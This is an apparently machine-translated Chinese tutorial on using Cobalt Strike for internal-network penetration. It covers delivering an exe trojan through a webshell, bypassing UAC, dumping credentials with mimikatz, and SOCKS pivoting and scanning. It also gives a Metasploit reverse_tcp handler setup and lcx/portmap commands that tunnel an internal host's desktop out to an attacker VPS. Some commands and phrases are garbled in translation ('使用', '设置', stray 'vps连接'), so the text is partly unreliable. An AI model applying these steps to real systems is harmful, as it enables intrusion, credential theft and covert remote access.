vps连接 Cobalt strike在内网渗透中的使用

在上一篇文章中介绍了使用Cobalt strike发送钓鱼邮件，但是Cobalt strike不仅用于钓鱼邮件，还是一个非常强大的内网渗透工具。 下面介绍一下如何在Net中用一些脚本来横冲直撞。

首先我们模拟环境

也就是说web服务器是一个通过端口映射发布网站的内网主机，攻击者有一个linux vps。 接下来我们模拟内网穿透。

首先登录我们的vps，将Cobalt strike上传到服务器。

./teamserver vps_ip 密码

然后在本地启动，启动的时候host写vps的ip。

建立连接。 连接之后，我们还是先建一个监听器，然后生成一个exe木马。 这些在之前的文章中已经介绍过了，就不多说了。 然后我们把exe上传到webshel​​l中执行。 发现在客户端已经在线了。

但是我们的权限不是很高，只是一个webserver权限，常用的提权脚本我们都试过了，还是不行怎么办=。 =

其实可以通过cobalt strike实现提权，使用Bypass UAC（在一个测试任务中，2012服务器上的各种脚本提权失败，但是通过使用bypass uac成功拿下）。

点击target，右键->access->bypass uac，稍等片刻，下面会提示是否成功，成功后会在上面的列表中生成一个新的带*号的主机，如下图所示。

现在我们可以抓取密码了，不用慌，cobalt strike中也集成了mimikatz，进入access -> run mimikatz，就可以看到抓取的密码了。

如果不想自己找账号密码，可以在credentials中查看vps连接，非常方便。

在内网渗透中，在带壳的机器上部署一个socks可以使用本地工具进行内网渗透，所以cobalt strike也集成了这个功能。 prvoiing -> socks服务器建立成功后vps连接，会显示如下：

然后我们就可以通过proxychains代理进行内网穿透了。

当然，作为一个强大的协同工作平台+渗透工具，怎么可能没有一些常用的扫描功能呢。

cobalt strike集成了端口扫描，位于explore -> port scan。

默认扫描为/24，您可以选择多种扫描方式。

我们也可以通过explore -> net view检测内网存活的主机。

如果觉得这些功能太少，cobalt strike也可以配合msf使用。 首先，我们需要使用 msf 创建一个监视器。 命令如下：

msf > 使用 exploit/multi/handler

msf exploit(handler) > 设置 payload windows/meterpreter/reverse_tcp

有效负载 => windows/meterpreter/reverse_tcp

msf exploit(handler) > 设置 lhost 192.168.146.178

lhost => 192.168.146.178

msf exploit(handler) > 设置 lport 2222

lport => 2222

msf exploit(处理程序) > exploit -j

然后我们在cobalt strike中新建一个monitor，选择windows/foreign/reverse_tcp，

host填msf的ip，port填刚刚设置的ip

然后选择如下：

选择刚才选择的listener，然后我们回到msf，看到session已经获取到了。

有时候，我们需要进入内网机器，比如有些软件需要在桌面环境下打开，或者有些管理员会在桌面放一些东西，cobalt strike也想到了这个问题，所以我们也可以通过这个桌面进入环境。

在explore->desktop(vnc)点击等待就可以看到了，但是有一些问题，因为是http传输，速度很慢，可能连不上，但是我们可以通过lcx(windows)端口或者portmap (linux) 转发得到桌面环境，比较稳定。 给出命令：

shell是windows，vps是linux。

win下执行：

lcx -slave vps_ip port local_ip port1

vps下执行：

./portmap -m 2 -p1 端口 -h2 vps_ip -p2 7777

那么我们只需要在本地远程连接vps_ip:7777就可以远程连接到内网主机了。

总结：

内网环境复杂，但毕竟是内网，只要认真研究就可以拿下，也不能认为自己没做过，什么都得去试，对不对？